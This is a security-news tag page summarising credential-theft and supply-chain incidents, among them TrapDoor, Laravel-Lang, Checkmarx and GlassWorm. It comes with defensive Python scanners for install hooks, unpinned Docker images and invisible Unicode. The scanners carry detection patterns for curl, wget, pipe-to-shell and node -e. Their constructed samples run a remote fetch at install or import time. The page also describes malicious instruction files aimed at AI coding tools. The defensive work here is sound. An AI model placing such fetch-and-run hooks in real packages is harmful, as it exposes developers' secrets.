Tag

Credential Theft

All articles tagged with #credential theft

TrapDoor Strikes npm, PyPI, and Crates.io with Cross-Ecosystem Credential-Stealing Malware
security · 1 day ago

A coordinated TrapDoor campaign targets npm, PyPI, and Crates.io, distributing 34 malicious packages across hundreds of versions to steal developer secrets: crypto wallets, SSH keys, cloud credentials, and environment data. The npm payloads run trap-core.js to harvest credentials, establish persistence via cron, systemd, and Git hooks, and move laterally over SSH; the Rust crates search keystores and exfiltrate data to GitHub Gists; the Python packages execute on import and fetch a remote JavaScript payload that they run via node -e. The packages also plant instructions in .cursorrules and CLAUDE.md files to manipulate the AI coding tools that read them during PR work, signaling an evolution of developer-workflow attacks across multiple ecosystems.
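The summary above describes three execution paths a defender can check for statically: npm lifecycle scripts that spawn `node -e` or fetch a payload during install, Python modules whose top-level code runs a subprocess on import, and AI-assistant instruction files (.cursorrules, CLAUDE.md) slipped into a pull request. The Python below is an added example written for this page, not TrapDoor's code or any vendor's tool; the package.json and __init__.py inputs are constructed, and the pattern list, sink list and file-name set are assumptions meant to be extended.

```python
"""Added example (not the campaign's code): static checks for the install-time,
import-time and AI-instruction paths described above. All inputs are constructed."""
import ast
import json
import re

# Shell fragments that have no business in an install hook (assumed list; extend it).
SUSPICIOUS_SCRIPT_PATTERNS = [
    r"\bnode\s+-e\b",             # inline JavaScript payload
    r"\bcurl\b|\bwget\b",         # remote fetch during install
    r"\|\s*(ba)?sh\b",            # pipe-to-shell
    r"base64\s+(-d|--decode)\b",  # decoding a staged payload
    r"\beval\b",
]
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

def audit_package_json(text: str) -> list:
    """Return one finding per suspicious pattern found in an npm lifecycle script.
    Lifecycle scripts run automatically on `npm install`, which is why they are
    the first place to look; ordinary scripts such as `test` are ignored."""
    findings = []
    scripts = json.loads(text).get("scripts", {})
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook, "")
        for pat in SUSPICIOUS_SCRIPT_PATTERNS:
            if re.search(pat, cmd):
                findings.append(f"{hook}: /{pat}/ in {cmd!r}")
    return findings

# Callables that should never execute merely because a module was imported (assumed list).
IMPORT_TIME_SINKS = {
    "subprocess.run", "subprocess.Popen", "subprocess.call", "subprocess.check_output",
    "os.system", "os.popen", "urllib.request.urlopen", "requests.get", "exec", "eval",
}

def _dotted_name(node):
    """Rebuild 'a.b.c' from a Name/Attribute chain, or return '' if it is not one."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _dotted_name(node.value)
        return f"{base}.{node.attr}" if base else ""
    return ""

def _import_time_calls(node):
    """Yield Call nodes reachable without entering a function or lambda body:
    those are the calls Python executes when the module is imported."""
    for child in ast.iter_child_nodes(node):
        if isinstance(child, (ast.FunctionDef, ast.AsyncFunctionDef, ast.Lambda)):
            continue
        if isinstance(child, ast.Call):
            yield child
        yield from _import_time_calls(child)

def audit_python_module(src: str) -> list:
    """Flag sink calls that run at import time, e.g. a subprocess spawned from
    __init__.py. Calls inside def bodies are not reported."""
    tree = ast.parse(src)
    return [
        f"line {call.lineno}: {_dotted_name(call.func)}() runs at import time"
        for call in _import_time_calls(tree)
        if _dotted_name(call.func) in IMPORT_TIME_SINKS
    ]

# File names taken from the summary; other agents read other files, so extend as needed.
AI_INSTRUCTION_FILES = {".cursorrules", "CLAUDE.md"}

def flag_ai_instruction_files(changed_paths: list) -> list:
    """Return changed paths that are AI-assistant instruction files. Tools treat
    their contents as directives, so a PR that adds or edits one needs a human read."""
    return [p for p in changed_paths if p.rsplit("/", 1)[-1] in AI_INSTRUCTION_FILES]

# Constructed samples: a package whose postinstall runs an inline payload, and an
# __init__.py that spawns node at import while a helper's subprocess call is benign.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "example-lib", "version": "1.0.0",
    "scripts": {"postinstall": "node -e \"require('./trap-core.js')\"", "test": "jest"},
})
SAMPLE_INIT_PY = (
    "import subprocess\n"
    "VERSION = '1.0'\n"
    "subprocess.run(['node', '-e', 'fetch(\"https://example.invalid/p.js\")'])\n"
    "def helper():\n"
    "    subprocess.run(['ls'])\n"
)

if __name__ == "__main__":
    for finding in audit_package_json(SAMPLE_PACKAGE_JSON) + audit_python_module(SAMPLE_INIT_PY):
        print(finding)
    print(flag_ai_instruction_files(["src/index.js", "CLAUDE.md", "docs/.cursorrules"]))
```

Run the three functions over an extracted tarball before the package ever reaches `npm install` or `pip install`; the checks are heuristics, so a clean result is not a clean package, but a hit on a lifecycle hook or an import-time subprocess is reason enough to stop and read the code.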

Massive Laravel-Lang Breach Sparks Cross-Platform Credential Theft
cybersecurity · 2 days ago

Security researchers warn of a broad compromise of the Laravel-Lang PHP packages (laravel-lang/lang, http-statuses, attributes, actions) that injected a malicious src/helpers.php into files Composer autoloads from the vendor tree. The attack involved rapid tagging of 700+ package versions in May 2026, suggesting access to the Laravel Lang release infrastructure. The embedded dropper runs on application startup and delivers a ~5,900-line PHP credential stealer that collects cloud tokens, service credentials, browser data, VPN configs and more, encrypts the results with AES-256, exfiltrates them to flipboxstudio.info, and self-deletes. On Windows the payload is launched through a Visual Basic Script; on Linux/macOS it runs via the shell. Remediation includes auditing dependencies and the installed vendor tree, rotating credentials, upgrading to clean versions, and monitoring for indicators of compromise.

Checkmarx Supply-Chain Breach: Poisoned KICS Docker Images and Malicious VS Code Extensions
security · 1 month ago

Security researchers warn of a Checkmarx supply-chain breach. Attackers overwrote tags on the official checkmarx/kics Docker Hub repository (notably v2.1.20 and alpine, and added a new v2.1.21) with a compromised KICS binary that exfiltrates data and can encrypt scan reports and send them to an external endpoint. Separately, the Checkmarx VS Code extensions cx-dev-assist and ast-results (versions 1.17.0 and 1.19.0) load a remote mcpAddon.js from a hard-coded GitHub URL, enabling credential theft and propagation; the attackers introduced the large payload through a backdated commit. The operation uses stolen tokens to create public repositories and GitHub Actions workflows and to exfiltrate GitHub, AWS/Azure/GCP credentials, npm configs, SSH keys, and environment variables, both to those public repos and to an attacker-controlled endpoint. It also spreads through the npm ecosystem by republishing ~250 compromised packages, and 51 repositories reference Checkmarx Configuration Storage in their READMEs. TeamPCP is suspected. Mitigation includes removing the affected artifacts, rotating credentials, auditing GitHub workflows, reviewing npm packages, and monitoring access logs.
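The Docker Hub part of this breach worked because a tag such as v2.1.20 is a mutable pointer: whoever controls the repository can re-point it at a different image, while a sha256 digest names exactly one manifest. The audit below is an added example written for this page, not Checkmarx's tooling; it parses FROM lines and reports images pulled by tag rather than by digest. The Dockerfile text is constructed, and the digest in it is a placeholder, not the digest of any real image.

```python
"""Added example, not Checkmarx's tooling: flag Dockerfile FROM lines that pull an
image by mutable tag instead of by immutable digest. Inputs are constructed."""
import re

# FROM [--platform=...] <ref> [AS <stage>]
FROM_RE = re.compile(
    r"^\s*FROM\s+(?:--platform=\S+\s+)?(?P<ref>\S+)(?:\s+AS\s+(?P<stage>\S+))?\s*$",
    re.IGNORECASE,
)
DIGEST_RE = re.compile(r"^sha256:[0-9a-f]{64}$")

def parse_image_ref(ref: str) -> dict:
    """Split [registry[:port]/]name[:tag][@digest]. A colon counts as a tag
    separator only after the last slash; before it, it is a registry port."""
    digest = None
    if "@" in ref:
        ref, digest = ref.split("@", 1)
    tag = None
    if ref.rfind(":") > ref.rfind("/"):
        ref, tag = ref.rsplit(":", 1)
    return {"name": ref, "tag": tag, "digest": digest}

def audit_dockerfile(text: str) -> list:
    """Return one finding per FROM that is not pinned to a well-formed sha256 digest.
    References to earlier build stages and to `scratch` are not registry pulls."""
    findings, stages = [], set()
    for lineno, line in enumerate(text.splitlines(), 1):
        m = FROM_RE.match(line)
        if not m:
            continue
        ref, stage = m.group("ref"), m.group("stage")
        if stage:
            stages.add(stage.lower())
        if ref.lower() in stages or ref.lower() == "scratch":
            continue
        parsed = parse_image_ref(ref)
        if parsed["digest"] is None:
            findings.append(
                f"line {lineno}: {parsed['name']} pulled by tag "
                f"{parsed['tag'] or 'latest'!r}; a tag can be re-pointed, pin @sha256:<digest>"
            )
        elif not DIGEST_RE.match(parsed["digest"]):
            findings.append(f"line {lineno}: malformed digest {parsed['digest']!r}")
    return findings

# Constructed sample. The digest is a placeholder pattern, not a real image digest.
PLACEHOLDER_DIGEST = "sha256:" + "0123456789abcdef" * 4
SAMPLE_DOCKERFILE = "\n".join([
    "FROM checkmarx/kics:v2.1.20 AS kics",                # mutable tag, the case above
    f"FROM golang:1.22@{PLACEHOLDER_DIGEST} AS build",    # pinned
    "FROM kics",                                          # earlier stage, not a pull
    "FROM scratch",
])

if __name__ == "__main__":
    for finding in audit_dockerfile(SAMPLE_DOCKERFILE):
        print(finding)
```

Pinning only helps if the digest you record is the one the vendor actually published: take it from the `Digest:` line that `docker pull` prints (or from `docker buildx imagetools inspect`) and compare it with the vendor's release notes or signature before committing it, because resolving a tag after it has been overwritten pins the attacker's image just as firmly.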

Canva Counted Among ~100 Victims in Shiny Hunters Credential Theft
technology · 3 months ago

The Register reports that Canva is among about 100 organizations affected by the Shiny Hunters credential-theft operation; the piece lists numerous advertising-tech vendors and the types of data and session cookies involved. The breadth of the victim list underscores the attack surface across the ad-tech ecosystem and the need for credential hygiene and monitoring for suspicious activity across partner platforms.

Malicious npm Packages Exploit Phishing to Steal Login Credentials
cybersecurity · 4 months ago

Cybersecurity researchers uncovered a targeted spear-phishing campaign that used 27 malicious npm packages to host browser-based phishing lures mimicking document-sharing portals and Microsoft sign-in pages, aimed primarily at organizations in critical-infrastructure sectors across multiple countries. The campaign serves the lures through public package CDNs for resilient hosting, employs anti-analysis techniques, and hard-codes the target email addresses into the pages, with the goal of stealing login credentials. Because the registry is used as hosting rather than as a dependency, the packages need never be installed to do harm, which makes monitoring of registry activity as important as dependency verification.

Security Threats Emerge from Malicious and AI-Generated Extensions on Developer Platforms
cybersecurity · 6 months ago

Cybersecurity researchers have identified three malicious VS Code extensions linked to the GlassWorm campaign, which hides its malicious code behind invisible Unicode characters, steals credentials, and spreads in a worm-like fashion. Despite removal efforts, the threat has resurfaced, using blockchain-based command-and-control infrastructure for resilience. The attack has affected victims worldwide, including a major Middle Eastern government, and has expanded to target GitHub repositories.
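Invisible code points are the one part of the GlassWorm summary a reviewer can check mechanically. The scanner below is an added example written for this page, not the researchers' or the attackers' code; the page does not say which characters GlassWorm uses, so the scanner covers the ranges that commonly hide text in source (zero-width and bidi controls, variation selectors, the Unicode tag block, plus any other format character) and decodes tag-block sequences, which map one-to-one onto printable ASCII. The sample source is constructed.

```python
"""Added example (not GlassWorm's or the researchers' code): report characters that
render as nothing or reorder text, and decode Unicode tag-block payloads."""
import unicodedata

# Code points that print as nothing or alter display order (assumed set; extend it).
ZERO_WIDTH = {0x200B, 0x200C, 0x200D, 0x2060, 0xFEFF, 0x180E, 0x034F, 0x115F, 0x1160, 0x3164, 0xFFA0}
BIDI_CONTROLS = {0x200E, 0x200F, 0x061C, *range(0x202A, 0x202F), *range(0x2066, 0x206A)}
VARIATION_SELECTORS = set(range(0xFE00, 0xFE10)) | set(range(0xE0100, 0xE01F0))
TAG_BLOCK = set(range(0xE0000, 0xE0080))  # U+E0000..E007F: invisible, used to smuggle ASCII

def is_hidden(ch: str) -> bool:
    """True for characters that should never appear in reviewed source text."""
    cp = ord(ch)
    if cp in ZERO_WIDTH or cp in BIDI_CONTROLS or cp in VARIATION_SELECTORS or cp in TAG_BLOCK:
        return True
    # Any other format character (category Cf, e.g. soft hyphen) is also suspicious.
    return unicodedata.category(ch) == "Cf"

def scan_text(text: str) -> list:
    """Return (line, column, 'U+XXXX', name) for each hidden character, 1-based."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for col, ch in enumerate(line, 1):
            if is_hidden(ch):
                hits.append((lineno, col, f"U+{ord(ch):04X}", unicodedata.name(ch, "<unnamed>")))
    return hits

def decode_tag_payload(text: str) -> str:
    """U+E0020..U+E007E are the tag-block copies of ASCII 0x20..0x7E, so subtracting
    0xE0000 recovers the smuggled text. All other characters are dropped."""
    return "".join(chr(ord(c) - 0xE0000) for c in text if 0xE0020 <= ord(c) <= 0xE007E)

def scan_file(path: str) -> list:
    """Scan a file read as UTF-8; undecodable bytes are replaced rather than skipped."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return scan_text(fh.read())

# Constructed sample: a zero-width space inside an identifier (two names that look
# identical but are different symbols) and a comment carrying tag-encoded 'eval'.
SAMPLE_SOURCE = (
    "const x = 1;\n"
    "const y\u200b = 2;\n"
    "// \U000E0065\U000E0076\U000E0061\U000E006C\n"
)

if __name__ == "__main__":
    for hit in scan_text(SAMPLE_SOURCE):
        print(hit)
    print("tag payload:", decode_tag_payload(SAMPLE_SOURCE))
```

The column numbers are code-point offsets, which is what an editor shows when you jump to the location; run `scan_file` over an extension's `.js` files and over any repository diff before merging, and treat a non-empty result in code (as opposed to a localized string literal) as a block.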

Google Enhances Security Measures to Combat Account Hacks and Cyberattacks
technology · 9 months ago

Google reports a significant increase in account-hijacking attacks, mostly via phishing and credential theft: an 84% rise last year, continuing into 2025. The company provides a step-by-step account-recovery guide, emphasizing recovery from trusted devices and adherence to its security steps. Experts note that attackers often send credential-harvesting lures from legitimate, compromised email accounts, so the risk extends beyond Google users. Users are advised to stay vigilant and follow recommended security practices to protect their accounts.

Massive 16 Billion Passwords Leak Sparks Crypto Security Concerns
technology · 11 months ago

A leak of more than 16 billion credentials covering accounts on major services such as Apple, Google, and Facebook raises significant security concerns, especially for crypto users, because it could fuel a wave of account takeovers and thefts. The exposure highlights the weakness of password reuse and single-factor authentication, and users are urged to change passwords, enable 2FA, and secure their account-recovery data.

Massive Data Breach Exposes 184 Million Passwords, Urging Immediate Security Measures
technology · 1 year ago

Pakistan's National Cyber Emergency Response Team has urged citizens to change their social media passwords after a global data leak exposed 184 million account credentials, which creates a risk of account takeover, identity theft, and targeted scams. It recommends acting immediately by setting strong, unique passwords and enabling multi-factor authentication to limit the damage.

Cyber Threat Alert: Phishing Attacks Exploit Microsoft Visio Files
cybersecurity · 1 year ago

Security researchers at Perception Point have identified a two-step phishing technique that uses Microsoft Visio (.vsdx) files to evade detection and steal credentials. The attacks rely on the familiarity of Visio files in workplaces, embedding malicious URLs that lead to fake Microsoft 365 login pages. Victims are told to hold down Ctrl and click to follow the link, a manual step that automated URL scanners do not perform, so the lure slips past them. Stronger email security and two-factor authentication are recommended to mitigate these threats.

Snowflake and Ticketmaster Breaches: Credential Theft and Data Leaks Under Scrutiny
cloud-security-data-protection · 2 years ago

Snowflake has warned that a targeted credential theft campaign is affecting a limited number of its cloud customers, with threat actors using stolen credentials obtained through infostealing malware to access accounts with single-factor authentication. The company, along with CrowdStrike and Mandiant, has found no evidence of a platform vulnerability or compromised Snowflake personnel credentials. Organizations are urged to enable multi-factor authentication and restrict network traffic to trusted locations. The U.S. CISA and Australia's ACSC have issued similar advisories following the spike in malicious activity.

Cloud Security Alert: Kinsing Actors Exploit Linux Flaw for Breaching Environments
cybersecurity · 2 years ago

Threat actors associated with Kinsing are exploiting the recently disclosed Linux privilege-escalation flaw Looney Tunables (CVE-2023-4911, a bug in the glibc dynamic loader's handling of GLIBC_TUNABLES) in a new experimental campaign aimed at breaching cloud environments; this is the first documented active exploitation of the flaw. The attackers are also harvesting cloud service provider (CSP) credentials from the compromised hosts. Kinsing has a history of quickly adapting its attack chain to newly disclosed flaws: here it gains initial access through a critical remote code execution vulnerability in PHPUnit (CVE-2017-9841) and then uses Looney Tunables to escalate to root. The end goal is to collect CSP credentials for later attacks, pointing to a broadening and intensification of the Kinsing operation in cloud-native environments.